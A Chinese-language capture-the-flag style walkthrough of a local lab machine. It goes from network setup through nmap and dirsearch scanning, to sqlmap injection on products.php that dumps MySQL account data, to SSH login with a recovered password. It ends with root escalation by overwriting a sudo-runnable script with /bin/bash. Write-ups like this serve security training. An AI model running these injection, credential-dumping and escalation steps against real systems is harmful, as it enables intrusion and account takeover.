一、导入靶机需要先配置网卡
1.靶机网卡
靶机默认仅主机网卡IP为192.168.1.120,最好设置一个与靶机同网段的网卡
2.kali网卡
给kali添加一个网卡,并设置为仅主机,并且网段为1
二、对靶机进行服务探测和端口扫描
1.利用nmap对靶机IP进行扫描
nmap -sV -O 192.168.1.120
2.进行靶机IP访问
已知靶机开启了80等端口,直接访问web
3、对靶机进行目录扫描
dirsearch -u http://192.168.1.120 经过拼接访问,没啥重要信息
4、在主页面继续尝试挖掘
在点击到Add的时候,发现页面跳转到一个提交页面
5.尝试随便输入一个值,点击提交 没什么发现
6、尝试点击页面可的地方(View Products)
7、再吃尝试点击提交
发现出现了参数,直接SQL注入
三、利用sqlmap进行测试
1、利用sqlmap跑
sqlmap -u "http://192.168.1.120/products.php?id=1" --random-agent --batch
发现存在漏洞
2、获取数据库
sqlmap -u "http://192.168.1.120/products.php?id=1" --dbs --random-agent --batch
3、获取Mysql库下面的账户信息
sqlmap -u "http://192.168.1.120/products.php?id=1" -D mysql --users --password --random-agent --batch
经过尝试,使用其账户进行SSH登录,最终使用账户:ccoffee 密码:starwars 登录(刚开始已经扫描出了22端口了)
四、提权
1、先远程连接上SSH
2、利用SUID提权
枚举出所有带有SUID权限的文件
find / -perm -u=s -type f 2>/dev/null
3、通过查找文件发现/home/ccoffee/scripts/getlogs.sh文件可以提权
(1)先切换到/home/ccoffee/scripts目录下
(2)输入以下命令
mv getlogs.sh getlogs.sh.bak #先把原文件备份下来
echo "/bin/bash" > getlogs.sh #写入一个/bin/bash到和原文件名一样的文件中
chmod +x getlogs.sh #给该文件加权限
(3)使用sudo 运行getlogs.sh文件
提权成功